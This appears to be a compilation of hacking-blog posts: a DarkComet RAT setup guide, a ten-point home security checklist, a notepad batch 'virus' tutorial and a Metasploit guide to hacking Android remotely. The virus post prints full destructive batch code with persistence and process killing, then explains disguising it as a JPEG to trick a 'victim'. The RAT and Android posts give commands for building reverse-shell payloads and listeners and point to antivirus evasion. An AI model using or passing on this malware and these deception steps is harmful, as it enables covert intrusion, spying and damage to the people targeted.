Remote Administration Tool Darkcomet RAT Setting up Without Portforwarding

It is a step by step tutorial with screen shots explaining about how to setup Remote administration tool Darkcomet RAT's remote server without Portforwarding .

Read my previous article to know more about RAT: What is RATs and how it is popular in hacking remotely (Remote Administrative tool)

Let's start,

1) Click Here and make your no-ip  account 1st.

2) Now click on Add a Host.

3.Now you will see this page.Fill the hostname field with a name.Your ip will be automatically entered.

4.Install No-ip Duc and open it.Click on Select Hosts.

5.Select the host you created and then click on save.

PROXPN

Note:If you have portforwarded then leave this part.Follow this part if you can’t portforward. Read my previous tutorial to setup Darkcomet with portforwarding

1.Click Here and Install Proxpn and create an account.

2.Now Connect.

DARKCOMET

Download Darkcomet

1.Open up Darkcomet and click on edit server.

2.Don’t Select Security Password and click on generate a few times.

3.Now go to network settings and enter your no-ip address and desired port number then click on Test Network and then Add this configuration.

4.Now go to module start up and choose the options that are in the image because these settings can interfere with crypting.I recommend using crypter start up.

5.Adding a Message is your choice.

6.Don’t select any options as these will make the user thing they are infected so they might just format their pc’s.

7.Make sure that is checked.

7.Now go to build module and select what is in the image(it should be generate stubb,most likely) and click build.You can save it whereever you want.

You are done,

Now you can RAT someone by giving him/her this Server file (.exe)

Read my previous post to bypass antivirus detection  when you send your server file for remote installation.

You can also use FUD crypter and binder tools for this.

Top 10 Ways To Secure Your Digital Life From Hackers

In this post i am discussing about what is digital life and how it is possible to hack your digital life, so here i am giving you top 10 ways to secure your Digital Life from hackers.

When Wired News reporter Mat Honan had his digital life hacked—and subsequently, virtually wiped out—in August, the significant loss of data he endured wasn't the scariest part of the experience. Much more terrifying was the method by which hackers drilled into his digital accounts.

Using clever social engineering exploits, the hackers posed as Honan and succeeded in extracting key bits of personal information from AMAZON and Apple customer support. With the critical data in hand, the hackers then locked Honan out of his Google account, commandeered his Twitter stream, seized control of his Apple ID number, and wiped his computing devices clean.

It was momentarily life-wrecking, at least.

If a hacker wanted to ruin your life—whether by identity theft or by a simple Honan-esque data wipe—how difficult would that objective be to achieve? The answer is that it's likely a lot easier than you think.

Are you an easy target?

According to a recent Harris Interactive poll commissioned by Dashlane, a company that manages passwords and personal data, most online Americans are concerned that their personal data might be used online without their knowledge. Approximately 88 percent of the 2208 adults surveyed cited being at least "somewhat concerned," and 29 percent claimed to be "extremely concerned." In addition, three out of five respondents were worried that they were vulnerable to being hacked.

John Harrison, a group manager at Symantec Security and Response, says that people should be concerned, because they're sharing more than they think they are.

Because social networks, public records, and high-profile security breaches are so prevalent, a lot of potentially sensitive information is just floating around the Internet.

"Each piece of information adds to the puzzle," Harrison says. "We don't throw everything out there at once, but it eventually comes together. For example, you may not put your full birthday on Facebook, but it's not difficult for someone to find out what year you graduated from high school and put two and two together."

In other words, you may not think you're sharing too much—just a snippet here and a snippet there—but to a hacker, you're building an easily harvested online profile.

1. Secure your WIFI connection

Home users are particularly prone to leaving their routers open without passwords, in order to make sure that you’re protected check your router settings to verify whether encryption is turned on or not. leaving access unencrypted can be just a minor issue of bandwidth being stolen by unauthorized users freeloading off your connection to more serious cybercrimes like credit card fraud or hacking taking place using your internet connection, which may be traced back to you.

The majority of routers support encrypted connections, support either WEP or WPA/WPA2, always opt for WPA/WPA2 as it’s far more secure. If you have the option hide SSID broadcast, turn that on as well, it basically allows you to make your wireless router invisible to outsiders and they need to know your SSID to access the network.

2. Encrypt your hard drive

It’s important to keep your data secure in case of loss of hardware or even theft. An encrypted hard drive basically prevents its contents from being access without the password. It is obviously more important to encrypt thumb drives and laptop drives. 

Windows 7 Ultimate and Business editions come with a built in hard drive functionality using a software called BitLocker which will encrypt your entire hard drive, but users with Home Premium or Basic users shouldn’t feel left out as there is a free way to encrypt your hard drive using trucrypt.

Mac users can use FileVault to encrypt their folders, and OSX Lion will allow you to encrypt your entire hard drive aswell.You can also get hardware encryption which will use fingerprint recognition to unlock data inside the drive like the Lacie Rugged Safe.

3. Keep your software updated

It’s a given that you need to keep your operating system, antivirus and web browser up to date in order to protect yourself from exploits, and if you haven’t got automatic update turned on for them, you should do it now.

However a lot of users often overlook other software such as Acrobat Reader, Flash, Java and iTunes when it comes to keeping software updated. It’s important to realize that many of these applications have direct access to the operating system, and an exploit in these applications can be used as a gateway into your system files. Flash and Acrobat are used heavily with web browsers which is the number one source of malware infections.

4. Upgrade your antivirus suite.

It’s as important to keep your virus suite updated as much as it is to keep your virus definitions updated. The reason for this is because antivirus software evolve in the way they deal with malware, such as introducing heuristic technologies which identify common traits of viruses, the way they interact with the system and actively block these scripts. 

This is why having an outdated antivirus software, despite updated virus definitions may not provide the best possible protection. If you’re using an older version of antivirus software you may entitled to discounted upgrades to newer versions.

5. Secure your smartphones

Many people completely overlook this fact, but smartphones are essentially mini computers which hold swathes of personal information about you. They often hold logins to your facebook/twitter accounts which are set on auto login, online banking and other financial information as well as access to email. If someone gets hold of all these details it can cause a lot of stress and havoc to your life.

It’s vital to keep your devices with password lock activated, additionally you should take some precautionary measures in case you lose your device.

Apple has a very cool security software called Find my iPhone which is a free app by Apple, which lets you track your phone by GPS, lock and remotely delete data from it. You can even use it just to locate your iPhone if you misplace it, causing it to sound an alarm.

For Android users it’s important to stay protected, smartphones are just as vulnerable to viruses as a PC, although the android platform is more prone to them than apple due to the open platform nature of the former. Android phones require antivirus protection, all the popular desktop antivirus brands offer android support as well.

The app store is less prone to malware due to the fact that all apps are vetted by Apple before publishing, although if you’ve jail broken your iPhone, antivirus protection may be something you need to look at.

6. Vet web page links using a link checker

Cyber criminals are using sophisticated strategies to drive users onto their web pages, increasingly innocent websites are being targeted using exploits to find security holes to hack and implant code on them which can launch JavaScript applications and infect computers when users visit the infected site.

 Link checkers scan links on your search results and optionally other websites and indicate whether links are safe, websites are scanned by their own servers so it does not impair your computer performance. Link checkers are available with most anti malware security suites such as with AVG, McAfee and Symantec.

7. Laptop Security for mobile workers

Laptops thefts are common, and are easy targets due to their transportable nature. If you work away from your office it’s important to invest in a Kensington Lock. While a lock won’t prevent trained thieves armed with cable cutters, it will prevent opportunistic thieves which is the overwhelming majority of laptop thefts.

It’s also important to keep prying eyes away from your data, always password protect your login, and when leaving your laptop unattended, using the screen lock feature in Windows to prevent unauthorized users from looking at or accessing your information.

If you work with particularly sensitive data a privacy screen may provide an added level of protection, the screen is only viewable to the person sitting directly in front, so people sitting around you cannot look at your screen. Targus and 3M are well known for producing privacy screens for all manner of monitor sizes.

8. HTTPS encryption for websites

Most people are well informed with the necessity of using https secure connections with online shopping when entering sensitive personal information. However, it can be argued that websites like facebook, twitter, gmail and others hold equally sensitive information about you.

Did you know you can elect to use https secure connections on these websites? For case by case uses, you can insert a ‘s’ after the http on the web address, if there isn’t one already to access the site securely. However if you want to access the sites securely every time you visit, you can login select the option to always use https in the profile settings.

Read my previous article to know more about website security: The SSL Certificate And  Website’s Security

9. Use online backup to keep an offsite storage of your files.

A great way for mobile workers to keep data kept safe and secure while on the move is to use online backup, this provides great peace of mind if your computer gets lost, as it allows you to recover your files from the cloud. Online backup services like Sugar Sync also provide users with high level synchronization features which can be used as a great time management tool as well, as it keeps data across all your computers consistent and up to date. 

You can look up various online backup reviews here to compare their features and read up user reviews.

10. Avoid public wifi and public computers.

Using public computers can be incredibly risky as malware and key loggers can be installed to track your keystrokes and cached files in order to gain access to your private information.

Additionally, public wifi connections can be risky as the servers can be breached with malware additionally phantom hotspots can be set up which appear like legitimate hotspots, but are actually other ordinary laptops which act as a middleman eavesdropping into the connection.

An example on how cached data can be hijacked to login to your web accounts can be demonstrated using FireSheep.

Thankfully mobile 3G internet connections are becoming more affordable, and are often faster than public wifi hotspots. 3G connections are far more secure, additionally you may be able to tether your Smartphone internet connection to work on your laptop.

I hope this article helped you all for sure. And do follow these above top 10 steps and secure your digital life from hackers.

Thank you.

How To Make A Virus And Hide In An Image File (FUD)

Computer Virus Definition 

A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".Viruses often perform some type of harmful activity on infected hosts, such as stealing hard disk space or CPU time, accessing private information, corrupting data, displaying political or humorous messages on the user's screen, spamming their contacts, or logging their keystrokes. However, not all viruses carry a destructive payload or attempt to hide themselves—the defining characteristic of viruses is that they are self-replicating computer programs which install themselves without the user's consent.

Creating a dangerous virus using notepad

Here I give you instructions of making a highly dangerous virus using notepad!!

This virus has very very dangerous properties :-

1.Copy itself into startup

2.Copy itself over one thousand times into random spots in your computer.

3.Hide its self and all other created files

4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as Greatgame.bat (while saving select all files instead of text ).

Here is the Code:

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP

You are done making virus .

PLEASE DON'T  TEST IT ON YOUR COMPUTER:-

This was tutorial for making a batch file virus using notepad.You can also change the name of virus , after copying this code in notepad press CTRL + F and replace all the occurring of the word "Greatgame" with the name of your choice , but u also have to change name of the file

Hide virus in image file

Here i'm explaining one method on how to hide virus in an image file. By using this trick, you can easily hide virus and keylogger in jpeg image file

If you want to hide virus, you will require following files:

I. Download the tools

1. Easy Binder. (free)
2. Image to Icon Converter. (free)
3. Icon Changer. (free)

Download all the above files and now, you are ready to hide virus in jpeg.

II. Creating an Icon:

For this hack to work, you need an icon of image. Follow the steps below to create an icon:

1. Run Image to Icon Converter from downloaded files.

 Select the image in which you want to hide virus and then open this image in Image to icon converter. (Use image with size within 128 pixels. You can resize image using IrfanView. In IrfanView, Press Ctrl+R).

- Now, click on 128 X 128 checkbox at bottom. Click on Size button and hit on 128 X 128.

2. Adjust image crop, if necessary. Hit on Make. Go to File -> Save and save it on your desktop for later use. Let this icon be "Icon.ico".


III. Steps to hide virus:


1. Now, run Easy Binder.exe from file downloaded to see:

2. Click "+" button present at bottom pane, browse to your virus file named as Greatgame.bat file and add it. Again using same "+" button, add the image in which you want to hide virus.

3. Now, click on "Settings" present at top to see:

4. Now, click on button next to "Select an Icon" and browse to the "Icon.ico" file created in Step II.

5. Click on button next to "Set Output File" and enter the path where you want to save binded file. Hit on "File's" tab in upper pane and then click on "Bind files". Let this final file be "Binded.exe".

NOTE: Now you got the virus file attached with an image file named "Binded.exe" and it will be detected by Anti virus, so to make it fully undetectable (FUD) you need to follow my previous tutorial: How To Bypass EXE File's Antivirus Detection Using Metasploit (FUD)


IV. Changing Extension and Icon:

1. After you are done with making your virus file FUD, Open My Computer and go to Tools -> Folder Options. Click on View tab and uncheck "Hide extension for known file types" and hit on OK.

2. Now, rename our "Binded.exe" to say "JessicaAlba.jpeg-JessicaAlba.com"

The format should be:
Imagename.jpeg - Any name.com

I have used JessicaAlba because I am using her image to hide my server.

3. Now, install Icon Changer on your computer obtained from downloaded files. Right click on our binded file and hit on "Change Icon". Hit on Folder icon next to "Search icons in" as shown:

4. In the dialog box, click on Desktop and hit OK. Now, our Icon.ico will be displayed. Select it and hit on "Set".

You will see your final virus like this:

Note: Usually, .exe extension creates a doubt in victim's mind. So, we are using .com extension to fool victim. Usually, people don't have knowledge of .com extension and out of "JessicaAlba.jpeg-Jessica1.com" they consider "JessicaAlba.jpeg" as image name with .jpeg as image extension. This fools the victim.

That's it friends. We are successful to hide virus in a jpeg image. Now, send this binded image file to your victim and whenever he will run the image on his computer, your sent hidden virus will be installed on victim computer without his knowledge.

NOTE:- This virus is very very dangerous , it can crash your system completely.Please do not harm anyone using this virus. This is only for education purposes.

Hack Android Remotely Using Kali Linux

This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux.

Read my previous articles to setup Kali Linux:

An Introduction To Hacker’s OS: Kali Linux And Setup Tutorial

How to Install Kali Linux on Android

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up you need to find your public/external ip and port forwarding 

Let's start,

Creating a booby trapped APK file

Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for the LPORT address.)

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

9. You can see the processes running by typing, “ps”:

You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

Recommended Articles To Become A Hacker:

How To Become A Hacker - Complete Guide For Beginners 2015

Understand The Hacker Mindset To Become A Real Hacker

Programming Languages For Hackers And Learn It From Most 6 Helpful Websites

Installing Hacker's OS Kali Linux In VMware (Beginners Guide With Screenshots)

Easy Steps to Create Web Penetration Testing Lab in Kali Linux

Introduction to using Metasploit in Kali Linux

An Introduction To Hacker’s OS: Kali Linux And Setup Tutorial.

Linux Powerful Distros For Hacking Or Security: Kali, Tails And Qubes

Become A Hacker: What Is Denial of Service (DoS) Attack?